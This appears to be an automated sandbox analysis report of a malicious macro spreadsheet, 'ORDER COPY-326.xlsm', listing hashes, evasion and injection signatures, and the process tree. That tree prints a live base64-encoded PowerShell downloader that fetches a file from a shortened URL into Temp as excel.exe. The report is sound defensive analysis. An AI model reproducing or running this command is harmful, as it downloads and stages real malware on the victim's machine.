Analysis
-
max time kernel
139s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 16:21
Static task
static1
Behavioral task
behavioral1
Sample
ORDER COPY-326.xlsm
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ORDER COPY-326.xlsm
Resource
win10v20201028
General
-
Target
ORDER COPY-326.xlsm
-
Size
154KB
-
MD5
9a30f275af39b20ce59988b3c1724a68
-
SHA1
d35c17ba0c5f09cb212e0a50d117b91d278ec6b3
-
SHA256
7fe87c98f71cb7cfad4b7713284b7cfe1a0a5e059d5eb5e2c1b322426a6e52ff
-
SHA512
7898565b62505be720c625899fd3b9f1fb9338a8653066f2c9bf660a1f59fa16529ce4c8e6c1ee597fc3855992ca1e522dce536790c8268ca75684f79636031d
Malware Config
Extracted
https://cutt.ly/fxD7Hr0
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3532 496 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 22 4080 powershell.exe 24 4080 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 496 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4080 powershell.exe 4080 powershell.exe 4080 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4080 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE 496 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEcmd.execmd.exedescription pid process target process PID 496 wrote to memory of 3532 496 EXCEL.EXE cmd.exe PID 496 wrote to memory of 3532 496 EXCEL.EXE cmd.exe PID 3532 wrote to memory of 2812 3532 cmd.exe cmd.exe PID 3532 wrote to memory of 2812 3532 cmd.exe cmd.exe PID 2812 wrote to memory of 4080 2812 cmd.exe powershell.exe PID 2812 wrote to memory of 4080 2812 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER COPY-326.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/496-2-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmpFilesize
64KB
-
memory/496-3-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmpFilesize
64KB
-
memory/496-4-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmpFilesize
64KB
-
memory/496-5-0x00007FF803080000-0x00007FF8036B7000-memory.dmpFilesize
6.2MB
-
memory/496-6-0x00007FF7DFCE0000-0x00007FF7DFCF0000-memory.dmpFilesize
64KB
-
memory/2812-8-0x0000000000000000-mapping.dmp
-
memory/3532-7-0x0000000000000000-mapping.dmp
-
memory/4080-9-0x0000000000000000-mapping.dmp
-
memory/4080-10-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmpFilesize
9.9MB
-
memory/4080-11-0x000001EBD5F80000-0x000001EBD5F81000-memory.dmpFilesize
4KB
-
memory/4080-12-0x000001EBD6130000-0x000001EBD6131000-memory.dmpFilesize
4KB
-
memory/4080-13-0x000001EBD5F70000-0x000001EBD5F72000-memory.dmpFilesize
8KB
-
memory/4080-14-0x000001EBD5F73000-0x000001EBD5F75000-memory.dmpFilesize
8KB
-
memory/4080-15-0x000001EBD5F76000-0x000001EBD5F78000-memory.dmpFilesize
8KB